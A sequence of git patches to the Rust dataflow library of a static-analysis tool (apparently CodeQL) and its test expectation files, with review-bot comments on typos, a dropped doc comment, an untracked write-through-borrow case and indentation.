@@ -431,7 +423,6 @@ nodes | test_logging.rs:175:48:175:73 | { ... } | semmle.label | { ... } | | test_logging.rs:175:66:175:73 | password | semmle.label | password | | test_logging.rs:178:9:178:13 | write | semmle.label | write | -| test_logging.rs:178:15:178:49 | MacroExpr | semmle.label | MacroExpr | | test_logging.rs:178:15:178:49 | res | semmle.label | res | | test_logging.rs:178:15:178:60 | ... .as_bytes(...) | semmle.label | ... .as_bytes(...) | | test_logging.rs:178:23:178:48 | ...::format(...) | semmle.label | ...::format(...) | @@ -440,7 +431,6 @@ nodes | test_logging.rs:178:23:178:48 | { ... } | semmle.label | { ... } | | test_logging.rs:178:41:178:48 | password | semmle.label | password | | test_logging.rs:181:9:181:13 | write | semmle.label | write | -| test_logging.rs:181:15:181:49 | MacroExpr | semmle.label | MacroExpr | | test_logging.rs:181:15:181:49 | res | semmle.label | res | | test_logging.rs:181:15:181:60 | ... .as_bytes(...) | semmle.label | ... .as_bytes(...) | | test_logging.rs:181:23:181:48 | ...::format(...) | semmle.label | ...::format(...) | diff --git a/rust/ql/test/utils-tests/modelgenerator/CaptureSummaryModels.expected b/rust/ql/test/utils-tests/modelgenerator/CaptureSummaryModels.expected index cb6fc390349c..55c2c12df107 100644 --- a/rust/ql/test/utils-tests/modelgenerator/CaptureSummaryModels.expected +++ b/rust/ql/test/utils-tests/modelgenerator/CaptureSummaryModels.expected 
@@ -1,2 +1,11 @@ unexpectedModel +| Unexpected summary found: repo::test;::clone;Argument[self].Field[crate::option::MyOption::MySome(0)].Reference;ReturnValue.Field[crate::option::MyOption::MySome(0)];value;dfc-generated | +| Unexpected summary found: repo::test;::from;Argument[0].Field[crate::option::MyOption::MySome(0)];ReturnValue.Field[crate::option::MyOption::MySome(0)].Reference;value;dfc-generated | +| Unexpected summary found: repo::test;::cloned;Argument[self].Field[crate::option::MyOption::MySome(0)].Reference;ReturnValue.Field[crate::option::MyOption::MySome(0)];value;dfc-generated | +| Unexpected summary found: repo::test;::get_or_insert;Argument[0];Argument[self].Field[crate::option::MyOption::MySome(0)];value;dfc-generated | +| Unexpected summary found: repo::test;::get_or_insert;Argument[self].Field[crate::option::MyOption::MySome(0)];ReturnValue.Reference;value;dfc-generated | +| Unexpected summary found: repo::test;::get_or_insert_default;Argument[self].Field[crate::option::MyOption::MySome(0)];ReturnValue.Reference;value;dfc-generated | +| Unexpected summary found: repo::test;::get_or_insert_with;Argument[self].Field[crate::option::MyOption::MySome(0)];ReturnValue.Reference;value;dfc-generated | +| Unexpected summary found: repo::test;::insert;Argument[self].Field[crate::option::MyOption::MySome(0)];ReturnValue.Reference;value;dfc-generated | +| Unexpected summary found: repo::test;::take_if;Argument[self].Field[crate::option::MyOption::MySome(0)];Argument[0].Parameter[0].Reference;value;dfc-generated | expectedModel From bb90b678a4979ef1c328bb6cd6448ed260f374ed Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Fri, 28 Feb 2025 10:43:48 +0100 Subject: [PATCH 039/892] Rust: update rust-specific toolchain --- rust/rust-toolchain.toml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rust/rust-toolchain.toml b/rust/rust-toolchain.toml index 60bdd6fbd0d8..1b61371a926c 100644 --- a/rust/rust-toolchain.toml 
+++ b/rust/rust-toolchain.toml @@ -3,6 +3,6 @@ # IMPORTANT: this can also have an impact on QL test results [toolchain] -channel = "1.84" +channel = "1.85" profile = "minimal" components = [ "clippy", "rustfmt", "rust-src" ] From 518f164c6167f9f57bcc54cafc874fceb9eca84d Mon Sep 17 00:00:00 2001 From: Simon Friis Vindum Date: Fri, 28 Feb 2025 09:01:47 +0100 Subject: [PATCH 040/892] Rust: Address PR comments --- .../rust/dataflow/internal/DataFlowImpl.qll | 34 ++++++++----------- .../codeql/rust/dataflow/internal/SsaImpl.qll | 16 ++++----- .../dataflow/pointers/inline-flow.expected | 15 -------- .../library-tests/dataflow/pointers/main.rs | 6 ++-- 4 files changed, 25 insertions(+), 46 deletions(-) diff --git a/rust/ql/lib/codeql/rust/dataflow/internal/DataFlowImpl.qll b/rust/ql/lib/codeql/rust/dataflow/internal/DataFlowImpl.qll index aacdf621ecee..4024f5974cf8 100644 --- a/rust/ql/lib/codeql/rust/dataflow/internal/DataFlowImpl.qll +++ b/rust/ql/lib/codeql/rust/dataflow/internal/DataFlowImpl.qll @@ -133,21 +133,21 @@ private predicate callToMethod(CallExpr call) { ) } -/** Holds if `arg` is an argument of `call` at the position `pos`. */ +/** + * Holds if `arg` is an argument of `call` at the position `pos`. + * + * Note that this does not hold for the receiever expression of a method call + * as the synthetic `ReceiverNode` is the argument for the `self` parameter. + */ private predicate isArgumentForCall(ExprCfgNode arg, CallExprBaseCfgNode call, ParameterPosition pos) { if callToMethod(call.(CallExprCfgNode).getCallExpr()) - then ( + then // The first argument is for the `self` parameter arg = call.getArgument(0) and pos.isSelf() or // Succeeding arguments are shifted left arg = call.getArgument(pos.getPosition() + 1) - ) else ( - // The self argument in a method call. - arg = call.(MethodCallExprCfgNode).getReceiver() and pos.isSelf() - or - arg = call.getArgument(pos.getPosition()) - ) + else arg = call.getArgument(pos.getPosition()) } /** 
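Review bot: The new doc comment on `isArgumentForCall` misspells "receiver" as "receiever" (`Note that this does not hold for the receiever expression of a method call`); the same misspelling is in the `implicitBorrow` comment shown as context in a later hunk of this file. The note would also read more precisely if it named the node type it means, since the `then` branch does bind a `self` argument for calls that go through `callToMethod`: for example `Note that this does not hold for the receiver of a MethodCallExpr, as the synthetic ReceiverNode is the argument for the self parameter.` That reading is inferred from the removed `else` branch, so confirm it before adopting the wording.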
@@ -370,11 +370,7 @@ module Node { private CallExprBaseCfgNode call_; private RustDataFlow::ArgumentPosition pos_; - ExprArgumentNode() { - isArgumentForCall(n, call_, pos_) and - // For receivers in method calls the `ReceiverNode` is the argument. - not call_.(MethodCallExprCfgNode).getReceiver() = n - } + ExprArgumentNode() { isArgumentForCall(n, call_, pos_) } override predicate isArgumentOf(DataFlowCall call, RustDataFlow::ArgumentPosition pos) { call.asCallBaseExprCfgNode() = call_ and pos = pos_ @@ -382,7 +378,7 @@ module Node { } /** - * The receiver of a method call _after_ any implicit borrow or dereferences + * The receiver of a method call _after_ any implicit borrow or dereferencing * has taken place. */ final class ReceiverNode extends ArgumentNode, TReceiverNode { @@ -400,7 +396,7 @@ module Node { override CfgScope getCfgScope() { result = n.getAstNode().getEnclosingCfgScope() } - override Location getLocation() { result = n.getLocation() } + override Location getLocation() { result = this.getReceiver().getLocation() } override string toString() { result = "receiver for " + this.getReceiver() } } @@ -559,7 +555,7 @@ module Node { override CfgScope getCfgScope() { result = n.getAstNode().getEnclosingCfgScope() } - override Location getLocation() { result = n.getLocation() } + override Location getLocation() { result = n.getReceiver().getLocation() } } final class SummaryPostUpdateNode extends FlowSummaryNode, PostUpdateNode { @@ -1050,7 +1046,7 @@ predicate lambdaCallExpr(CallExprCfgNode call, LambdaCallKind kind, ExprCfgNode } /** Holds if `mc` implicitly borrows its receiver. */ -predicate implicitBorrow(MethodCallExpr mc) { +private predicate implicitBorrow(MethodCallExpr mc) { // Determining whether an implicit borrow happens depends on the type of the // receiever as well as the target. As a heuristic we simply check if the // target takes `self` as a borrow and limit the approximation to cases where 
@@ -1060,7 +1056,7 @@ predicate implicitBorrow(MethodCallExpr mc) { } /** Holds if `mc` implicitly dereferences its receiver. */ -predicate implicitDeref(MethodCallExpr mc) { +private predicate implicitDeref(MethodCallExpr mc) { // Similarly to `implicitBorrow` this is an approximation. mc.getReceiver() instanceof VariableAccess and not mc.getStaticTarget().getParamList().getSelfParam().isRef() @@ -1727,7 +1723,7 @@ private module Cached { any(IndexExprCfgNode i).getBase(), any(FieldExprCfgNode access).getExpr(), any(TryExprCfgNode try).getExpr(), any(PrefixExprCfgNode pe | pe.getOperatorName() = "*").getExpr(), - any(AwaitExprCfgNode a).getExpr() + any(AwaitExprCfgNode a).getExpr(), any(MethodCallExprCfgNode mc).getReceiver() ] } or TReceiverNode(MethodCallExprCfgNode mc, Boolean isPost) or diff --git a/rust/ql/lib/codeql/rust/dataflow/internal/SsaImpl.qll b/rust/ql/lib/codeql/rust/dataflow/internal/SsaImpl.qll index 36f9545f4e17..87a8d6c0b0bd 100644 --- a/rust/ql/lib/codeql/rust/dataflow/internal/SsaImpl.qll +++ b/rust/ql/lib/codeql/rust/dataflow/internal/SsaImpl.qll @@ -47,13 +47,6 @@ module SsaInput implements SsaImplCommon::InputSig { BasicBlock getABasicBlockSuccessor(BasicBlock bb) { result = bb.getASuccessor() } - /** - * A variable amenable to SSA construction. - * - * All immutable variables are amenable. Mutable variables are restricted to - * those that are not borrowed (either explicitly using `& mut`, or - * (potentially) implicit as borrowed receivers in a method call). - */ class SourceVariable = Variable; predicate variableWrite(BasicBlock bb, int i, SourceVariable v, boolean certain) { 
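Review bot: `class SourceVariable = Variable;` in SsaImpl.qll is left without any doc comment once the old block is deleted, although only the restriction on borrowed mutable variables appears to be outdated. Keeping the first sentence, `/** A variable amenable to SSA construction. */`, would preserve the purpose of the alias. If mutably borrowed variables are now meant to be included, with writes through the borrow handled as uncertain definitions, one extra sentence saying so would help readers of `allowFlowIntoUncertainDef` further down; that reading is inferred from the later hunk, not stated here.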
@@ -381,8 +374,13 @@ private module DataFlowIntegrationInput implements Impl::DataFlowIntegrationInpu } predicate allowFlowIntoUncertainDef(UncertainWriteDefinition def) { - exists(Variable v, BasicBlock bb, int i | - def.definesAt(v, bb, i) and mutablyBorrows(bb.getNode(i).getAstNode(), v) + exists(CfgNodes::CallExprBaseCfgNode call, Variable v, BasicBlock bb, int i | + def.definesAt(v, bb, i) and + mutablyBorrows(bb.getNode(i).getAstNode(), v) + | + call.getArgument(_) = bb.getNode(i) + or + call.(CfgNodes::MethodCallExprCfgNode).getReceiver() = bb.getNode(i) ) } diff --git a/rust/ql/test/library-tests/dataflow/pointers/inline-flow.expected b/rust/ql/test/library-tests/dataflow/pointers/inline-flow.expected index 3ed7b7502562..450d33d39986 100644 --- a/rust/ql/test/library-tests/dataflow/pointers/inline-flow.expected +++ b/rust/ql/test/library-tests/dataflow/pointers/inline-flow.expected @@ -40,11 +40,6 @@ edges | main.rs:73:10:73:10 | [post] b [&ref] | main.rs:74:15:74:15 | b [&ref] | provenance | | | main.rs:73:14:73:23 | source(...) | main.rs:73:10:73:10 | [post] b [&ref] | provenance | | | main.rs:74:15:74:15 | b [&ref] | main.rs:74:14:74:15 | * ... | provenance | | -| main.rs:90:11:90:16 | [post] &mut a [&ref] | main.rs:90:16:90:16 | [post] a | provenance | | -| main.rs:90:16:90:16 | [post] a | main.rs:91:14:91:14 | a | provenance | | -| main.rs:90:21:90:30 | source(...) | main.rs:90:11:90:16 | [post] &mut a [&ref] | provenance | | -| main.rs:95:13:95:29 | mut to_be_cleared | main.rs:98:14:98:26 | to_be_cleared | provenance | | -| main.rs:95:33:95:42 | source(...) | main.rs:95:13:95:29 | mut to_be_cleared | provenance | | | main.rs:105:10:105:10 | [post] c [&ref] | main.rs:106:15:106:15 | c [&ref] | provenance | | | main.rs:105:14:105:23 | source(...) | main.rs:105:10:105:10 | [post] c [&ref] | provenance | | | main.rs:106:15:106:15 | c [&ref] | main.rs:106:14:106:15 | * ... | provenance | | 
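Review bot: `allowFlowIntoUncertainDef` now admits a mutable borrow only when the borrowing node is a call argument or a method-call receiver, and nothing in the predicate explains that choice or what it gives up. A write made directly through a borrow is no longer covered, which the pointers test in this same commit records as `sink(a); // $ MISSING: hasValueFlow=87` for `*(&mut a) = source(87)`. Taint-tracking queries built on this library would inherit that gap as a false negative, so it is worth stating on the predicate, for example `/** Holds if def is an uncertain write caused by a mutable borrow passed as a call argument or receiver; writes through a borrow outside a call are not tracked. */`. The predicate is fully visible in the hunk; the enclosing `DataFlowIntegrationInput` module starts and ends outside it.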
@@ -178,13 +173,6 @@ nodes | main.rs:73:14:73:23 | source(...) | semmle.label | source(...) | | main.rs:74:14:74:15 | * ... | semmle.label | * ... | | main.rs:74:15:74:15 | b [&ref] | semmle.label | b [&ref] | -| main.rs:90:11:90:16 | [post] &mut a [&ref] | semmle.label | [post] &mut a [&ref] | -| main.rs:90:16:90:16 | [post] a | semmle.label | [post] a | -| main.rs:90:21:90:30 | source(...) | semmle.label | source(...) | -| main.rs:91:14:91:14 | a | semmle.label | a | -| main.rs:95:13:95:29 | mut to_be_cleared | semmle.label | mut to_be_cleared | -| main.rs:95:33:95:42 | source(...) | semmle.label | source(...) | -| main.rs:98:14:98:26 | to_be_cleared | semmle.label | to_be_cleared | | main.rs:105:10:105:10 | [post] c [&ref] | semmle.label | [post] c [&ref] | | main.rs:105:14:105:23 | source(...) | semmle.label | source(...) | | main.rs:106:14:106:15 | * ... | semmle.label | * ... | @@ -290,7 +278,6 @@ subpaths | main.rs:253:24:253:32 | my_number [MyNumber] | main.rs:149:14:149:24 | ...: MyNumber [MyNumber] | main.rs:149:34:153:1 | { ... } | main.rs:253:14:253:33 | to_number(...) | | main.rs:255:24:255:32 | my_number [MyNumber] | main.rs:149:14:149:24 | ...: MyNumber [MyNumber] | main.rs:149:34:153:1 | { ... } | main.rs:255:14:255:33 | to_number(...) | testFailures -| main.rs:255:14:255:33 | to_number(...) | Unexpected result: hasValueFlow=99 | #select | main.rs:20:14:20:14 | c | main.rs:17:17:17:26 | source(...) | main.rs:20:14:20:14 | c | $@ | main.rs:17:17:17:26 | source(...) | source(...) | | main.rs:24:14:24:14 | n | main.rs:28:19:28:28 | source(...) | main.rs:24:14:24:14 | n | $@ | main.rs:28:19:28:28 | source(...) | source(...) | 
@@ -298,8 +285,6 @@ testFailures | main.rs:53:14:53:15 | * ... | main.rs:51:17:51:26 | source(...) | main.rs:53:14:53:15 | * ... | $@ | main.rs:51:17:51:26 | source(...) | source(...) | | main.rs:59:33:59:34 | * ... | main.rs:57:22:57:31 | source(...) | main.rs:59:33:59:34 | * ... | $@ | main.rs:57:22:57:31 | source(...) | source(...) | | main.rs:74:14:74:15 | * ... | main.rs:73:14:73:23 | source(...) | main.rs:74:14:74:15 | * ... | $@ | main.rs:73:14:73:23 | source(...) | source(...) | -| main.rs:91:14:91:14 | a | main.rs:90:21:90:30 | source(...) | main.rs:91:14:91:14 | a | $@ | main.rs:90:21:90:30 | source(...) | source(...) | -| main.rs:98:14:98:26 | to_be_cleared | main.rs:95:33:95:42 | source(...) | main.rs:98:14:98:26 | to_be_cleared | $@ | main.rs:95:33:95:42 | source(...) | source(...) | | main.rs:106:14:106:15 | * ... | main.rs:105:14:105:23 | source(...) | main.rs:106:14:106:15 | * ... | $@ | main.rs:105:14:105:23 | source(...) | source(...) | | main.rs:113:14:113:15 | * ... | main.rs:112:25:112:34 | source(...) | main.rs:113:14:113:15 | * ... | $@ | main.rs:112:25:112:34 | source(...) | source(...) | | main.rs:175:14:175:34 | my_number.to_number(...) | main.rs:174:44:174:53 | source(...) | main.rs:175:14:175:34 | my_number.to_number(...) | $@ | main.rs:174:44:174:53 | source(...) | source(...) | diff --git a/rust/ql/test/library-tests/dataflow/pointers/main.rs b/rust/ql/test/library-tests/dataflow/pointers/main.rs index b96246ff6c44..d7e28c9368f4 100644 --- a/rust/ql/test/library-tests/dataflow/pointers/main.rs +++ b/rust/ql/test/library-tests/dataflow/pointers/main.rs 
@@ -88,14 +88,14 @@ mod intraprocedural_mutable_borrows { let mut a = 1; sink(a); *(&mut a) = source(87); - sink(a); // $ hasValueFlow=87 + sink(a); // $ MISSING: hasValueFlow=87 } pub fn clear_through_borrow() { let mut to_be_cleared = source(34); let p = &mut to_be_cleared; *p = 0; - sink(to_be_cleared); // $ SPURIOUS: hasValueFlow=34 + sink(to_be_cleared); // variable is cleared } pub fn write_through_borrow_in_match(cond: bool) { @@ -252,7 +252,7 @@ mod interprocedural_mutable_borrows { (&mut my_number).set(source(99)); sink(to_number(my_number)); // $ hasValueFlow=99 (&mut my_number).set(0); - sink(to_number(my_number)); // SPURIOUS: hasValueFlow=99 + sink(to_number(my_number)); // $ SPURIOUS: hasValueFlow=99 } } From e0d4e5ea7f577046021e81e5c5c73c932c4b316f Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Fri, 28 Feb 2025 11:36:27 +0100 Subject: [PATCH 041/892] Rust: remove missing flow in test --- .../strings/inline-taint-flow.expected | 61 +++++++++++-------- .../library-tests/dataflow/strings/main.rs | 12 ++-- 2 files changed, 43 insertions(+), 30 deletions(-) diff --git a/rust/ql/test/library-tests/dataflow/strings/inline-taint-flow.expected b/rust/ql/test/library-tests/dataflow/strings/inline-taint-flow.expected index ee15de985dcd..c3f9e94239a5 100644 --- a/rust/ql/test/library-tests/dataflow/strings/inline-taint-flow.expected +++ b/rust/ql/test/library-tests/dataflow/strings/inline-taint-flow.expected 
@@ -1,8 +1,9 @@ models -| 1 | Summary: lang:alloc; ::from; Argument[0]; ReturnValue; value | -| 2 | Summary: lang:alloc; ::as_str; Argument[self]; ReturnValue; taint | -| 3 | Summary: lang:alloc; crate::fmt::format; Argument[0]; ReturnValue; taint | -| 4 | Summary: lang:core; crate::hint::must_use; Argument[0]; ReturnValue; value | +| 1 | Summary: lang:alloc; <_ as crate::string::ToString>::to_string; Argument[self]; ReturnValue; taint | +| 2 | Summary: lang:alloc; ::from; Argument[0]; ReturnValue; value | +| 3 | Summary: lang:alloc; ::as_str; Argument[self]; ReturnValue; taint | +| 4 | Summary: lang:alloc; crate::fmt::format; Argument[0]; ReturnValue; taint | +| 5 | Summary: lang:core; crate::hint::must_use; Argument[0]; ReturnValue; value | edges | main.rs:26:9:26:9 | s | main.rs:27:19:27:25 | s[...] | provenance | | | main.rs:26:13:26:22 | source(...) | main.rs:26:9:26:9 | s | provenance | | 
@@ -12,41 +13,46 @@ edges | main.rs:32:9:32:10 | s1 | main.rs:35:9:35:10 | s4 | provenance | | | main.rs:32:14:32:23 | source(...) | main.rs:32:9:32:10 | s1 | provenance | | | main.rs:35:9:35:10 | s4 | main.rs:38:10:38:11 | s4 | provenance | | -| main.rs:51:9:51:10 | s1 | main.rs:52:27:52:28 | s1 | provenance | | -| main.rs:51:14:51:29 | source_slice(...) | main.rs:51:9:51:10 | s1 | provenance | | -| main.rs:52:9:52:10 | s2 | main.rs:53:10:53:11 | s2 | provenance | | -| main.rs:52:14:52:29 | ...::from(...) | main.rs:52:9:52:10 | s2 | provenance | | -| main.rs:52:27:52:28 | s1 | main.rs:52:14:52:29 | ...::from(...) | provenance | MaD:1 | +| main.rs:51:6:51:7 | s1 | main.rs:52:24:52:25 | s1 | provenance | | +| main.rs:51:11:51:26 | source_slice(...) | main.rs:51:6:51:7 | s1 | provenance | | +| main.rs:52:6:52:7 | s2 | main.rs:53:7:53:8 | s2 | provenance | | +| main.rs:52:11:52:26 | ...::from(...) | main.rs:52:6:52:7 | s2 | provenance | | +| main.rs:52:24:52:25 | s1 | main.rs:52:11:52:26 | ...::from(...) | provenance | MaD:2 | +| main.rs:57:6:57:7 | s1 | main.rs:58:11:58:12 | s1 | provenance | | +| main.rs:57:11:57:26 | source_slice(...) | main.rs:57:6:57:7 | s1 | provenance | | +| main.rs:58:6:58:7 | s2 | main.rs:59:7:59:8 | s2 | provenance | | +| main.rs:58:11:58:12 | s1 | main.rs:58:11:58:24 | s1.to_string(...) | provenance | MaD:1 | +| main.rs:58:11:58:24 | s1.to_string(...) | main.rs:58:6:58:7 | s2 | provenance | | | main.rs:63:9:63:9 | s | main.rs:64:16:64:16 | s | provenance | | | main.rs:63:13:63:22 | source(...) | main.rs:63:9:63:9 | s | provenance | | -| main.rs:64:16:64:16 | s | main.rs:64:16:64:25 | s.as_str(...) | provenance | MaD:2 | +| main.rs:64:16:64:16 | s | main.rs:64:16:64:25 | s.as_str(...) | provenance | MaD:3 | | main.rs:68:9:68:9 | s | main.rs:70:34:70:61 | MacroExpr | provenance | | | main.rs:68:9:68:9 | s | main.rs:73:34:73:59 | MacroExpr | provenance | | | main.rs:68:13:68:22 | source(...) 
| main.rs:68:9:68:9 | s | provenance | | | main.rs:70:9:70:18 | formatted1 | main.rs:71:10:71:19 | formatted1 | provenance | | | main.rs:70:22:70:62 | ...::format(...) | main.rs:70:9:70:18 | formatted1 | provenance | | -| main.rs:70:34:70:61 | MacroExpr | main.rs:70:22:70:62 | ...::format(...) | provenance | MaD:3 | +| main.rs:70:34:70:61 | MacroExpr | main.rs:70:22:70:62 | ...::format(...) | provenance | MaD:4 | | main.rs:73:9:73:18 | formatted2 | main.rs:74:10:74:19 | formatted2 | provenance | | | main.rs:73:22:73:60 | ...::format(...) | main.rs:73:9:73:18 | formatted2 | provenance | | -| main.rs:73:34:73:59 | MacroExpr | main.rs:73:22:73:60 | ...::format(...) | provenance | MaD:3 | +| main.rs:73:34:73:59 | MacroExpr | main.rs:73:22:73:60 | ...::format(...) | provenance | MaD:4 | | main.rs:76:9:76:13 | width | main.rs:77:34:77:74 | MacroExpr | provenance | | | main.rs:76:17:76:32 | source_usize(...) | main.rs:76:9:76:13 | width | provenance | | | main.rs:77:9:77:18 | formatted3 | main.rs:78:10:78:19 | formatted3 | provenance | | | main.rs:77:22:77:75 | ...::format(...) | main.rs:77:9:77:18 | formatted3 | provenance | | -| main.rs:77:34:77:74 | MacroExpr | main.rs:77:22:77:75 | ...::format(...) | provenance | MaD:3 | +| main.rs:77:34:77:74 | MacroExpr | main.rs:77:22:77:75 | ...::format(...) | provenance | MaD:4 | | main.rs:82:9:82:10 | s1 | main.rs:86:18:86:25 | MacroExpr | provenance | | | main.rs:82:9:82:10 | s1 | main.rs:87:18:87:32 | MacroExpr | provenance | | | main.rs:82:14:82:23 | source(...) | main.rs:82:9:82:10 | s1 | provenance | | | main.rs:86:10:86:26 | res | main.rs:86:18:86:25 | { ... } | provenance | | | main.rs:86:18:86:25 | ...::format(...) | main.rs:86:10:86:26 | res | provenance | | | main.rs:86:18:86:25 | ...::must_use(...) | main.rs:86:10:86:26 | MacroExpr | provenance | | -| main.rs:86:18:86:25 | MacroExpr | main.rs:86:18:86:25 | ...::format(...) | provenance | MaD:3 | -| main.rs:86:18:86:25 | { ... 
} | main.rs:86:18:86:25 | ...::must_use(...) | provenance | MaD:4 | +| main.rs:86:18:86:25 | MacroExpr | main.rs:86:18:86:25 | ...::format(...) | provenance | MaD:4 | +| main.rs:86:18:86:25 | { ... } | main.rs:86:18:86:25 | ...::must_use(...) | provenance | MaD:5 | | main.rs:87:10:87:33 | res | main.rs:87:18:87:32 | { ... } | provenance | | | main.rs:87:18:87:32 | ...::format(...) | main.rs:87:10:87:33 | res | provenance | | | main.rs:87:18:87:32 | ...::must_use(...) | main.rs:87:10:87:33 | MacroExpr | provenance | | -| main.rs:87:18:87:32 | MacroExpr | main.rs:87:18:87:32 | ...::format(...) | provenance | MaD:3 | -| main.rs:87:18:87:32 | { ... } | main.rs:87:18:87:32 | ...::must_use(...) | provenance | MaD:4 | +| main.rs:87:18:87:32 | MacroExpr | main.rs:87:18:87:32 | ...::format(...) | provenance | MaD:4 | +| main.rs:87:18:87:32 | { ... } | main.rs:87:18:87:32 | ...::must_use(...) | provenance | MaD:5 | nodes | main.rs:26:9:26:9 | s | semmle.label | s | | main.rs:26:13:26:22 | source(...) | semmle.label | source(...) | 
@@ -58,12 +64,18 @@ nodes | main.rs:32:14:32:23 | source(...) | semmle.label | source(...) | | main.rs:35:9:35:10 | s4 | semmle.label | s4 | | main.rs:38:10:38:11 | s4 | semmle.label | s4 | -| main.rs:51:9:51:10 | s1 | semmle.label | s1 | -| main.rs:51:14:51:29 | source_slice(...) | semmle.label | source_slice(...) | -| main.rs:52:9:52:10 | s2 | semmle.label | s2 | -| main.rs:52:14:52:29 | ...::from(...) | semmle.label | ...::from(...) | -| main.rs:52:27:52:28 | s1 | semmle.label | s1 | -| main.rs:53:10:53:11 | s2 | semmle.label | s2 | +| main.rs:51:6:51:7 | s1 | semmle.label | s1 | +| main.rs:51:11:51:26 | source_slice(...) | semmle.label | source_slice(...) | +| main.rs:52:6:52:7 | s2 | semmle.label | s2 | +| main.rs:52:11:52:26 | ...::from(...) | semmle.label | ...::from(...) | +| main.rs:52:24:52:25 | s1 | semmle.label | s1 | +| main.rs:53:7:53:8 | s2 | semmle.label | s2 | +| main.rs:57:6:57:7 | s1 | semmle.label | s1 | +| main.rs:57:11:57:26 | source_slice(...) | semmle.label | source_slice(...) | +| main.rs:58:6:58:7 | s2 | semmle.label | s2 | +| main.rs:58:11:58:12 | s1 | semmle.label | s1 | +| main.rs:58:11:58:24 | s1.to_string(...) | semmle.label | s1.to_string(...) | +| main.rs:59:7:59:8 | s2 | semmle.label | s2 | | main.rs:63:9:63:9 | s | semmle.label | s | | main.rs:63:13:63:22 | source(...) | semmle.label | source(...) | | main.rs:64:16:64:16 | s | semmle.label | s | 
@@ -103,7 +115,8 @@ testFailures #select | main.rs:28:16:28:21 | sliced | main.rs:26:13:26:22 | source(...) | main.rs:28:16:28:21 | sliced | $@ | main.rs:26:13:26:22 | source(...) | source(...) | | main.rs:38:10:38:11 | s4 | main.rs:32:14:32:23 | source(...) | main.rs:38:10:38:11 | s4 | $@ | main.rs:32:14:32:23 | source(...) | source(...) | -| main.rs:53:10:53:11 | s2 | main.rs:51:14:51:29 | source_slice(...) | main.rs:53:10:53:11 | s2 | $@ | main.rs:51:14:51:29 | source_slice(...) | source_slice(...) | +| main.rs:53:7:53:8 | s2 | main.rs:51:11:51:26 | source_slice(...) | main.rs:53:7:53:8 | s2 | $@ | main.rs:51:11:51:26 | source_slice(...) | source_slice(...) | +| main.rs:59:7:59:8 | s2 | main.rs:57:11:57:26 | source_slice(...) | main.rs:59:7:59:8 | s2 | $@ | main.rs:57:11:57:26 | source_slice(...) | source_slice(...) | | main.rs:64:16:64:25 | s.as_str(...) | main.rs:63:13:63:22 | source(...) | main.rs:64:16:64:25 | s.as_str(...) | $@ | main.rs:63:13:63:22 | source(...) | source(...) | | main.rs:71:10:71:19 | formatted1 | main.rs:68:13:68:22 | source(...) | main.rs:71:10:71:19 | formatted1 | $@ | main.rs:68:13:68:22 | source(...) | source(...) | | main.rs:74:10:74:19 | formatted2 | main.rs:68:13:68:22 | source(...) | main.rs:74:10:74:19 | formatted2 | $@ | main.rs:68:13:68:22 | source(...) | source(...) | diff --git a/rust/ql/test/library-tests/dataflow/strings/main.rs b/rust/ql/test/library-tests/dataflow/strings/main.rs index e34b0cdab4c1..01041e3df463 100644 --- a/rust/ql/test/library-tests/dataflow/strings/main.rs +++ b/rust/ql/test/library-tests/dataflow/strings/main.rs 
@@ -48,15 +48,15 @@ fn string_add_reference() { } fn string_from() { - let s1 = source_slice(36); - let s2 = String::from(s1); - sink(s2); // $ hasValueFlow=36 + let s1 = source_slice(36); + let s2 = String::from(s1); + sink(s2); // $ hasValueFlow=36 } fn string_to_string() { - let s1 = source_slice(22); - let s2 = s1.to_string(); - sink(s2); // $ MISSING: hasTaintFlow=22 + let s1 = source_slice(22); + let s2 = s1.to_string(); + sink(s2); // $ hasTaintFlow=22 } fn as_str() { From 6b34d3f4805a2f44684882d0a037b7e0e721cb2a Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Fri, 28 Feb 2025 12:26:03 +0100 Subject: [PATCH 042/892] Rust: add missing empty expected file --- .../generated/RecordField/RecordField_getExpr.expected | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 rust/ql/test/extractor-tests/generated/RecordField/RecordField_getExpr.expected diff --git a/rust/ql/test/extractor-tests/generated/RecordField/RecordField_getExpr.expected b/rust/ql/test/extractor-tests/generated/RecordField/RecordField_getExpr.expected new file mode 100644 index 000000000000..e69de29bb2d1 From 0445d886c76f0179d5731199d5d7bcfe1e30984a Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Fri, 28 Feb 2025 12:39:37 +0100 Subject: [PATCH 043/892] QL for QL: update toolchain --- ql/Cargo.lock | 38 ++++++++++++++++++++++---------------- ql/Cargo.toml | 1 + ql/rust-toolchain.toml | 7 ------- 3 files changed, 23 insertions(+), 23 deletions(-) delete mode 100644 ql/rust-toolchain.toml diff --git a/ql/Cargo.lock b/ql/Cargo.lock index 853271e24e64..6632bf162eec 100644 --- a/ql/Cargo.lock +++ b/ql/Cargo.lock @@ -1,6 +1,6 @@ # This file is automatically @generated by Cargo. # It is not intended for manual editing. -version = 3 +version = 4 [[package]] name = "adler2" 
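Review bot: The bodies of `string_from` and `string_to_string` appear to be re-indented as well as updated. The matching rows in the `.expected` file move from column 9 to column 6 (`main.rs:51:9:51:10` becomes `main.rs:51:6:51:7`), while rows for neighbouring functions such as `main.rs:63:9:63:9` keep column 9. If this is an editor applying a different indent, restoring the file's existing indentation would reduce the functional change to the one line `sink(s2); // $ hasTaintFlow=22` and leave the `string_from` locations in the `.expected` file untouched. The whitespace itself cannot be seen in this view, so the point is inferred from the column shift only.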
